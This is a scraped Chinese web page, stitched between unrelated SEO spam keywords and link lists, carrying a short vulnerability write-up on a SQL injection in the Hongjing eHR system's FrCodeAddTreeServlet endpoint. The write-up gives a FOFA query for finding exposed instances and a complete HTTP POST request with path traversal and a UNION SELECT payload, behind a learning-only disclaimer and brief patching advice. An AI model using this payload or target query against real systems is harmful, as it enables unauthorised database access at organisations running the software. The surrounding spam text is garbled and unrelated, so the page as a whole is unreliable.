当前位置: 首页 > news >正文

淮安网站设计小黄豆crm

淮安网站设计,小黄豆crm,高端建站属于外包公司么,万网个人网站备案查询前言 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产…

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、产品简介

宏景eHR是一款面向国有企事业单位的人力资源管理数智化软件产品,旨在帮助企业实现人力资源的数字化和智能化管理。

二、漏洞描述

该系统FrCodeAddTreeServlet接口存在SQL注入漏洞

三、影响范围

未知

四、复现环境

FOFA:app=“HJSOFT-HCM”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.测试payload

POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: IP:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Length: 132
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencodedparams=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1'+UNION+ALL+SELECT+123,NULL,NULL,NULL,NULL,NULL--+

3.成功
在这里插入图片描述

在这里插入图片描述

六、修复建议

及时更新系统,安装防护设备,过滤请求中的敏感字符

http://www.yayakq.cn/news/170680/

相关文章:

  • 四川建设企业网站深圳市建设工程监理协会网站
  • 怎么做购物型网站wordpress文章空格
  • 薇诺娜经常在那个网站做特价白沙的网站建设
  • 企业网站优化服务商搭建网站 优帮云
  • 网站建设模板制作做网站需要什么步骤
  • 粉红色的网站首页南阳网站推广费用
  • 汇鑫网站建设方便一个互联网公司可以做几个网站
  • 福州做网站的哪家好网站美工如何做
  • 买了个域名 如何自己做网站php mysql网站开发书
  • 国家企业信用信息公示系统官网站丹阳网站建设哪家好
  • 怎么建立一个公司的网站吗网站开发工程师获奖
  • 电商网站建设流程郑州上街网站建设公司
  • 太原如何做百度的网站网站么做淘宝客赚佣金
  • seo 网站两个ipwordpress标签加icon
  • aspx网站开发 案例企业网站建设的本质及特点
  • 东莞建外贸网站免费1级做爰片在线观看网站
  • 青海省建设厅勘察设计备案网站徐州建设工程交易网中标公示
  • 北京网站设计公司有哪些南宁市视点网络信息有限公司
  • 宁波建站WordPress中文旅游模板
  • 做网站好学吗豪车网站建设背景
  • 潍坊作风建设年网站什么是响应式设计
  • 雷州网站建设优化课程体系
  • aspnet网站开发选择题北京做网站设计
  • 网站域名可以改么如何建设小说网站并且盈利
  • 网站建设报价单范本电商网站开发环境怎么写
  • 门户网站自查整改情况报告网络推广的平台有哪些
  • 北京建设工程继续教育网站河南住房和城乡建设部网站首页
  • 建设资讯网站营销企业网站建设步骤
  • 公司网站建设需要什么科目广告制作公司怎么拉业务
  • 银川市做网站的公司静态网站设计与制作书籍